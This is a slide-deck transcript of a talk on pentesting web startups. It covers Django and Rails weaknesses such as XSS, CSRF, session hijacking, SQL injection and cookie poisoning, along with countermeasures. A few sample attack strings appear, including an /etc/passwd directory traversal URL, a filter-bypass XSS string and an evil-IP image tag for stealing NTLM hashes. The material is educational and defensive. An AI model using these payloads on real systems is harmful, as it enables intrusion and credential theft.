Pentesting for startups

3,673 views

Published on

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,673
On SlideShare
0
From Embeds
0
Number of Embeds
1,256
Actions
Shares
0
Downloads
56
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide
  • All windows machines have this issue due to netbios \\\\
  • Pentesting for startups

    1. 1. Pentestingfor startups<br />By<br /> Levi Gross<br />
    2. 2. Shameless self promotion<br />I work at AxialMarket<br />Researching computer security for 11 years.<br />Pentesting for 8 years<br />Python is my language of choice <br />Contact info<br />Blog: http://www.levigross.com<br />levi@levigross.com<br />@levigross<br />
    3. 3. Disclaimer<br />This talk is strictly for educational purposes. I am not responsible for any outcome of this talk.<br />All images used in the subsequent slides are for informational purposes only and are owned by their respective copyright holders.<br />
    4. 4. The cost of ignorance<br />Dropbox<br />Gawker<br />Sony<br />
    5. 5. Python<br />Dangerous models<br />Pickle<br />Code execution<br />urllib<br />ssl certs<br />file:// is valid<br />Redirects allow any file to be read (this was fixed in 2.7.2)<br />XSS in Basic HTTPServer<br />A wide open playground<br />But syntax is holy<br />Easy to execute code on the host system<br />eval<br />input<br />Unicode issues<br />C extensions <br />
    6. 6. Django<br />Auth Framework<br />Session framework<br />Uses unique hashes <br />Uses salted hashes<br />Can use MD5 and crypt but will auto upgrade<br />Basic global permission structure<br />cache backend uses pickle<br />Default use of unicode<br />Default URLS<br />Exceptions don’t propagate back to the user<br />Automatic variable escape<br />Built in CSRF protection<br />Unique hashes<br />In web forms as well as in the cookie<br />
    7. 7. Ruby<br />$SAFE isn’t really safe<br />Even layer 4 can be bypassed by exceptions<br />Patched but still insecure<br />SSL verification is disabled by default<br />Global Variables<br />Language syntax isn’t holy<br />Eval<br />FileUtils<br />remove_entry_secure<br />WEBrick issues<br />Buffer overflow in ARGF.inplace_mode= <br />C extensions<br />
    8. 8. Rails<br />Secure session framework<br />Try not to store data in cookies<br />Remember base64 is not a method of encryption.<br />The database is your friend<br />No information should be put into cookies besides for the hash<br />Signed cookies<br />REST<br />Basic permissions<br />Default variable escape<br />Escaping SQL statements<br />
    9. 9. Information Disclosure<br />Your Parts are showing<br />
    10. 10. General Information Disclosure<br />Job sites<br />Internal<br />External<br />Exceptions propagating to the end user<br />Showing everyone what you are running<br />Post mortem blog posts<br />Google<br />Pastebins<br />Complaints<br />Stack Exchange<br />Github<br />Mailing lists<br />Anomalies<br />Forgotten password?<br />Just ask…<br />
    11. 11. And so the fun begins…<br />File "/opt/python/domains/bitbucket.org/2011-01-05/bitbucket/../bitbucket/apps/bb/clogging.py", line 60, in wrap<br /> return f(request, *args, **kwargs)<br />File "/opt/python/domains/bitbucket.org/2011-01-05/bitbucket/../bitbucket/apps/bb/decorators.py", line 111, in wrap<br /> return f(req, *a, **kwa)<br />File "/opt/python/domains/bitbucket.org/2011-01-05/bitbucket/../bitbucket/apps/bb/views.py", line 211, in frontpage<br /> newsfeed = load_from_store(request.user)<br />File "/opt/python/domains/bitbucket.org/2011-01-05/bitbucket/../bitbucket/apps/bb/newsfeed.py", line 39, in load_from_store<br /> if not r.exists(key):<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 529, in exists<br /> return self.execute_command('EXISTS', name)<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 330, in execute_command<br /> **options<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 309, in _execute_command<br />self.connection.send(command, self)<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 82, in send<br />self.connect(redis_instance)<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 67, in connect<br /> redis_instance._setup_connection()<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 424, in _setup_connection<br />self.execute_command('SELECT', self.connection.db)<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 330, in execute_command<br /> **options<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 312, in _execute_command<br /> return self.parse_response(command_name, **options)<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 390, in parse_response<br /> response = self._parse_response(command_name, catch_errors)<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 335, in _parse_response<br /> response = conn.read()[:-2] # strip last two characters (rn)<br />File "/opt/python/domains/bitbucket.org/current/bitbucket/local/env/lib/python2.7/site-packages/redis/client.py", line 99, in read<br /> return self._fp.readline()<br />File "/opt/python/2.7/lib/python2.7/socket.py", line 445, in readline<br /> data = self._sock.recv(self._rbufsize)<br />
    12. 12. Pasting code into images<br />
    13. 13. But wait there’s more<br />remote: Push worked, but post-receive failed: Connection reset by peer<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:234:in `ensure_connected'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:114:in `process'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:183:in `logging'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:113:in `process'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:38:in `call'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis.rb:428:in `sadd'<br />remote: /usr/lib/ruby/1.8/monitor.rb:242:in `synchronize'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis.rb:427:in `sadd'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-namespace-0.8.0/lib/redis/namespace.rb:188:in `send'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-namespace-0.8.0/lib/redis/namespace.rb:188:in `method_missing'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/resque-1.10.0/lib/resque.rb:184:in `watch_queue'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/resque-1.10.0/lib/resque.rb:129:in `push'<br />remote: /data/github/current/vendor/gems/ruby/1.8/gems/resque-1.10.0/lib/resque/job.rb:51:in `create'<br />remote: /data/github/current/lib/rock_queue.rb:58:in `enqueue'<br />remote: /data/github/current/lib/rock_queue.rb:28:in `push'<br />remote: hooks/post-receive:37<br />
    14. 14. Not just code hosting sites<br />
    15. 15. Django Information Disclosure<br />Using the default URLS<br />Default paths for media<br />Admin Urls<br />Putting DB fields in urls<br />URLS == Views<br />Switching GET and POST<br />Dajax<br />Celery<br />Piston<br />Template code in the html<br />
    16. 16. Rails Information Disclosure<br />Using insecure gems<br />Don’t let exceptions propagate to a user<br />Raw template code in the page<br />View logic written in Javascript<br />Default URLS<br />Object ID’s in the URL<br />
    17. 17. Countermeasures<br />Never let exceptions propagate to end user<br />Don’t paste your raw tracebacks directly into any public online location.<br />Sanitize them<br />Every bit of information that is released can be used against you.<br />Don’t rely on anything here for security<br />
    18. 18. Build a profile of your target<br />Blackbox testing<br />Look for patterns<br />Corners cut<br />Style of code (html)<br />Learn about the application<br />Learn the problems/issues programmers face when dealing with these systems<br />Gauge difficulty<br />
    19. 19. Time to kick down the door<br />
    20. 20. Session Hijacking<br />TCP sniffing<br />Firesheep<br />ARP Poisoning<br />
    21. 21. HTTP Sessions in Django & Rails<br />Django<br />Each session is a unique hash value<br />Cookies can be read via javascript<br />Predictable cookie name ‘sessionid’<br />Uses the pickle model<br />Defaults to an insecure cookie<br />Values are stored in the session backend<br />No default cookie domain<br />File backend allows for reading on /tmp folder<br />Immune to classic cookie poisoning <br />Rails<br />Signed cookies<br />Default storage is to the cookie…<br />
    22. 22. Session Hijacking in Django and Rails<br />Once you have the cookie you have the user….<br />
    23. 23. Attack Scenarios<br />TCP Sniffing<br />WiFi<br />ARP Poisoning<br />Thank you SSL for being useless<br />Stealing cookies via a 3rd party site<br />Who needs passwords when you have sessions…<br />
    24. 24. Countermeasures<br />General<br />Cycle sessions when user authenticates<br />Use a cryptographic nonce<br />Django<br />Make sure you set the following settings<br />HTTP_ONLY (Only in 1.3) <br />SECURE<br />Change the cookie name<br />Serialize using JSON or YAML<br />Rails<br />Sign cookies<br />Make the cookies secure and HTTP only<br />Use the DB to store session data<br />Clear the sessions after login<br />
    25. 25. XSS (Cross site scripting)<br />Enables attackers to inject client-side script (html/JS) into web pages viewed by other users.<br />
    26. 26. XSS in Django<br />Auto escapes ‘<>&” with their “safe alternatives”<br />Problems<br />Any other unicode will bypass this check<br />If items are not properly quoted you can still inject attributes into tags<br />Other special characters aren’t escaped ( )<br />Designers<br />Hate |safe and just use {% autoescape off %}<br />
    27. 27. XSS in Rails<br /> 2.x <br />Variables aren’t automatically escaped<br />Tags are stripped using the strip_tags method<br />3.x<br />Automatic variable escape<br />Unless you use raw<br />or some other function that doesn’t return safe output<br />Attack<br />White lists are useless<br />selselectect <scri<script>pt><br />Sanitizing the HTML special characters has the same issue Django has.<br />Tags that don’t sanitize<br />Concatenation will remove any escaping<br />Sanitizing doesn’t always work. <br />AJAX still isn’t escaped<br />
    28. 28. Attack Scenarios<br />Steal user info<br />Change User settings<br />Steal an admin cookie and add yourself as an admin user.<br />Execute code as an admin to add yourself as an admin user<br />
    29. 29. Countermeasures<br />General<br />Force the browser to use UTF-8<br />Never trust user input<br />Don’t use user input for HTML tag attributes<br />Take a page out of the python zen<br />In the face of ambiguity, refuse the temptation to guess.<br />Django<br />Use the OWASP ESAPI<br />If you need styling<br />Use Sanitizers<br />lxml<br />bleach<br />Use markdown<br />Use whitelists not blacklists<br />Rails<br />Escape all user input<br />before_filter :only => […] instead of :except => […]<br />Use sanitizers<br />
    30. 30. Clickjacking<br />Overlaying the current website with an IFRAME.<br />Tricking the user into clicking on certain elements<br />User unknowingly performs action on the website he is logged into.<br />
    31. 31. Attack Scenario<br />Lure the user to your site.<br />Add yourself as an admin user<br />The skies the limit<br />
    32. 32. Frame busting<br />X-FRAME-OPTIONS DENY<br />Disable IFRAME javascript<br />Restricted => IE<br />Sandbox => Chrome<br />designMode in Firefox and Safari<br />Use javascript to navigate back to prevent IFRAMES from opening your site.<br />This is always being exploited so keep up with the latest exploits.<br />Read More: https://www.owasp.org/index.php/Clickjacking<br />
    33. 33. CSRF<br />Cross site request forgery<br />
    34. 34. CSRF in Django<br />Built in CSRF protection<br />Keep up to date<br />In the form and the HTTP headers/Cookie<br />Attacks<br />It’s annoying so people turn it off<br />Only recently do they check AJAX request<br />Use subdomains<br />
    35. 35. CSRF in Rails<br />Like Django recently changed<br />REST makes things harder…<br />Stored in the cookie<br />Attacks<br />A XSS exploit renders this protection useless.<br />Subdomains<br />
    36. 36. Attack Scenario<br />Attacker uses XSS to inject code within admin site to exploit internal site CSRF issue<br /><imgsrc=<evil IP> gives me your NTLM<br />
    37. 37. Cookie Poisoning<br />Cookies are encoded<br />Base64<br />People never see them…. <br />Lets store important information<br />Attacker can<br />Submit a malformed cookie<br />Steal another users cookie<br />
    38. 38. Cookie Poisoning in Django<br />Django defaults to it’s session backend which doesn’t do this.<br />Attack<br />People will still use request.COOKIES<br />Issues with session backend<br />
    39. 39. Cookie Poisoning in Rails<br />Rails allows you to shoot yourself in the foot.<br />Attack<br />Storing info in cookies<br />Not signing cookies<br />Using cookies to manipulate view logic<br />
    40. 40. Attack Scenario<br />Pass malformed cookie back to the server<br />DDOS<br />Remote code execution<br />Impersonation<br />
    41. 41. Counter Measures<br />Use sticky sessions<br />Django<br />Use session app<br />Use a consistent session backend<br />Escape and validate data<br />Rails<br />Sign your cookies<br />Only use hashes<br />Never trust the user<br />
    42. 42. HTTP Parameter Poisoning<br />Injecting invalid values into HTTP params<br />Directory Traversal<br />http://someserver/somepage/?val=g&file=../../../../../../etc/passwd<br />HTTP Response Splitting<br />Injecting /r/n into fields splitting the response headers<br />Remote file inclusion<br />/myview?someparam=C:ftpuploadexploit<br />Invalid method<br />Using a POST in place of a GET and vis a vis<br />Referrer poisoning<br />http://someserver/somepage/?val=g&referrer=<myurl><br />
    43. 43. HTTP Parameter Poisoning in Django<br />Django is immune to <br />Directory Traversal<br />HTTP Response Splitting<br />Remote file inclusion<br />Forms cleaned_data allows for value escaping<br />Attacks<br />Switching GET and Post are not enforced<br />Not all HTTP Params are autoescaped by default<br />Cache and sessions use pickle<br />
    44. 44. HTTP Parameter Poisoning in Rails<br />Blind use of HTTP parameters<br />Invalid file name checking<br />arbitrary file upload and execution<br />XSS<br />Remember use AJAX<br />Privilege escalation<br />SQL Injection<br />
    45. 45. Attack Scenarios<br />Remote code execution via the cache/session layer<br />Authentication bypass by GET/POST switch.<br />
    46. 46. Logic Flaws<br />Unauthenticated views<br />Information leaks<br />Weak or invalid permissions<br />eval<br />Passing unsanitary input around<br />
    47. 47. Exploiting Logic Flaws in Django &Rails <br />Django<br />@login_required<br />Permissions are global<br />Objects are serialized<br />Arbitrary input may have some exciting outcomes<br />Logic manipulation<br />debug=True<br />Remember in python nothing is sacred<br />Rails<br />explicit authentication<br />explicit permission checking<br />Ruby syntax is extendable <br />
    48. 48. SQL Injection<br />Cookies<br />HTTP Parameters<br />Logic Flaws<br />XSS<br />
    49. 49. SQL Injection in Django<br />Parameterized queries<br />LIKE queries are escaped<br />Attacks<br />WHERE is still injectable<br />People use cursor.raw() all the time<br />Character escaping is always being broken<br />More python unicode fun….<br />
    50. 50. SQL Injection in Rails<br />Uses regular expression to “escape” values<br />Even with parameterized queries <br />*.connection.quote<br />Very easy to execute raw SQL<br />where<br />order<br />
    51. 51. Attack Scenarios<br />Information theft<br />Hosting malware or exploits<br />Full site exploitation<br />
    52. 52. Counter Measures<br />Only use permissions that you need<br />Validate and sanitize all input (twice cannot hurt)<br />Encrypt sensitive data<br />
    53. 53. Passwords in Django<br />Brute force friendly<br />Salted hashes<br />Good but not perfect<br />Timing attacks<br />Mitigation added in 1.3 but flawed due to pythons string intern<br />Compatible with older insecure hashes<br />The Achilles heel of any system<br />
    54. 54. Passwords in Rails<br />No authentication<br />Very popular<br />REST Authentication<br />Blind use of params[:]<br />Clear text passwords in the logs<br />Brute force friendly<br />Salted hashes<br />Good but not perfect<br />Timing attacks<br />
    55. 55. What are timing attacks<br />Side channel attacks<br />Linear operations<br />The dangerous binary comparison..<br />
    56. 56. Countermeasures<br />
    57. 57. Authentication<br />OAUTH<br />Everyone forgets to use SSL<br />Even if you do your still opening yourself up to a Man In The Middle Attack<br />Best<br />Worst<br />
    58. 58. Attack Scenarios<br />Crack password<br />SQL injection<br />Brute Force<br />Phishing<br />DDOS<br />No SSL on OAuth<br />Even with SSL still vulnerable to a Man In the Middle attack<br />Have fun<br />
    59. 59. Countermeasures<br />Dual factor authentication<br />Rate limit authentication logic<br />Monitoring<br />Tough permission checks<br />Whitelists/blacklists<br />Certificate authentication to verify the provider<br />
    60. 60. Denial of Service in Django & Rails <br />Remember the GIL<br />No rate limiting<br />Switching HTTP methods<br />Python<br />Virtual methods calls<br />Ruby<br />Slow method dispatch<br />
    61. 61. Great another crazy guy screaming about the end of the world.<br />Never rely on one thing alone.<br />Ask yourself at every point of your application. “If someone penetrated until here what is stopping him?” <br />Onion?<br />Code defensively<br />Remember that unknown variables will enter the equation and you have to account for them.<br />Monitor everything<br />Show you care<br />Create a security page<br />Make sure to include a PGP key<br />Create an incident response document<br />Give it a trial run<br />Remember a good programmer looks both ways before crossing a one way street.<br />
    62. 62. Recommended Reading <br />General<br />https://www.owasp.org<br />https://www.owasp.org/index.php/Top_10_2010-Main<br />Writing Secure Code (by Microsoft Press)<br />Hacking Exposed web applications<br />The Web Application Hacker's Handbook<br />http://www.reddit.com/r/netsec<br />Django<br />http://www.djangobook.com/en/2.0/chapter20/<br />Rails<br />http://www.rorsecurity.info/<br />http://groups.google.com/group/rubyonrails-security<br />Tools<br />http://www.metasploit.com/download/<br />http://w3af.sourceforge.net/<br />
    63. 63. Questions<br />

    ×